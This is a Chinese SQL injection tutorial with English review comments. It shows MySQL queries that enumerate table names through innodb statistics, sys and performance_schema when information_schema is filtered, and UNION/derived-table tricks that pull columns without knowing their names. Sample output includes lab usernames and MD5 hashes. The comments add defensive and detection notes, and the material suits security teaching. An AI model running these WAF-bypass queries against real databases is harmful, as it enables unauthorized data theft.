
SQL注入限制条件下获取表名&无列名注入

获取表名

innodb存储引擎

Mysql>5.6.x 对于waf掉information_schema的情况,可以利用innodb_table_stats和innodb_index_stats两个表来查询到,但是mysql默认是关闭InnoDB存储引擎的

-- Persistent InnoDB statistics tables in the `mysql` system schema. Each row is
-- keyed by database_name/table_name (innodb_index_stats additionally by index
-- and statistic name, so table_name repeats there once per index statistic).
-- They are ordinary tables, so reading them needs SELECT on `mysql`.*; an
-- application account held to least privilege should not have that, and a
-- SELECT against mysql.* from an application connection is worth alerting on.
-- NOTE(review): the prose above says InnoDB is off by default — confirm; what
-- these tables actually need is InnoDB tables with persistent statistics.
select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();

sys

在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名

//视图名中包含in
-- `sys` schema views (MySQL 5.7.9+) layered over performance_schema and
-- information_schema; the x$ forms are the raw-value variants of the same
-- views. Every name here contains the substring "in", which only matters when
-- that token is filtered. Readable only with SELECT on `sys` and on the
-- underlying schemas. The buffer/index statistics views appear to list just
-- tables that have been loaded or touched since startup — presumably, so
-- coverage is partial; schema_auto_increment_columns lists only tables that
-- have an AUTO_INCREMENT column.
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();

//视图名中不包含in
-- Same `sys` mechanism with view names that do not contain the token "in".
-- These are statistics/key views, so they too appear to cover only tables the
-- server has opened or that carry keys — verify against the target. Access
-- still requires SELECT on `sys`; an application account should not have it,
-- and queries naming `sys`.* from that account are a clear detection signal.
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();

//通过表文件的存储路径获取表名
-- I/O-by-file views return tablespace file paths, not table names; the table
-- name has to be parsed out of the path (the <datadir>/<db>/<table>.ibd
-- layout — TODO confirm for the target's file-per-table setting). Note that
-- REGEXP DATABASE() interprets the schema name as a regular expression and
-- matches it anywhere in the path, so files whose path merely contains that
-- string also match, and names with regex metacharacters behave unexpectedly.
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
//包含之前查询记录的视图
-- statement_analysis is the `sys` view over performance_schema statement
-- digests: QUERY holds the normalized text of statements already executed by
-- any session (literals replaced by ?, and — presumably via
-- sys.format_statement — truncated to a configured length), so this returns
-- prior query shapes rather than just table names. Retention is bounded by the
-- digest summary table size. Because it exposes other sessions' SQL, an
-- application account should have no SELECT on `sys` or performance_schema.
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
performance_schema
-- performance_schema object and table summaries, each naming objects by
-- object_schema/object_name. They are filled from instrumentation, so only
-- tables the server has opened, waited on or locked since startup appear
-- (table_handles in particular reflects currently open table handles).
-- Requires SELECT on performance_schema, which an application account should
-- not hold; reads of performance_schema.* from an app login merit an alert.
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
//包含之前查询记录的表
-- Raw digest table behind sys.statement_analysis: digest_text is the
-- normalized text (literals replaced by ?) of statements already run by any
-- session, so the output is a history of query shapes touching this schema,
-- not only table names. Same privilege and exposure concern as `sys` above.
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
//包含表文件路径的表
-- One row per file the server has instrumented (open or recently opened);
-- file_name is a full path, so the table name must be parsed from it as with
-- the `sys` I/O views, and REGEXP DATABASE() is a regex substring match on
-- the whole path rather than an exact schema comparison.
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();

无列名注入

利用join进行无列名注入

-- The first UNION branch is a row of literals; it fixes the column count and
-- the result column names (1, 2, 3, 4), and the second branch appends every
-- row of users under those names, so the real column names are never needed.
-- The literal count must equal users' column count or the UNION errors.
-- As with any UNION-based injection, the fix lives in the application:
-- parameterized queries, not keyword or identifier filtering.
select 1,2,3,4 union select * from users;

1 2 3 4
1 2 3 4
1 admin e10adc3949ba59abbe56e057f20f883e 1
2 pikachu 670b14728ad9902aecba32e22fa4f6bd 2
3 test e99a18c428cb38d5f260853678922e03 3

-- Wrapping the UNION in a derived table (alias a) makes its columns
-- addressable by name; the third column is named by the literal 3, so it is
-- read as the quoted identifier `3`. The first output row is the literal row
-- from the numeric branch, the rest are users' third column.
select `3` from (select 1,2,3,4 union select * from users)a;

3
3
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03

如果反引号(`)被过滤,使用别名来代替:

-- Same derived-table approach without backtick quoting: aliases given in the
-- literal branch (2 as b, 4 as c) name the result columns, so the second
-- column of users is selected as plain b.
select b from (select 1,2 as b,3,4 as c union select * from users)a;

b
2
admin
pikachu
test

同时查询多个列:

-- Two aliased columns returned as one value: concat(b, 0x2d, c) joins them
-- with '-' (0x2d), yielding "b-c" per row as the sample output below shows.
select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4 union select * from users)a;

concat(b,0x2d,c)
2-3
admin-e10adc3949ba59abbe56e057f20f883e
pikachu-670b14728ad9902aecba32e22fa4f6bd
test-e99a18c428cb38d5f260853678922e03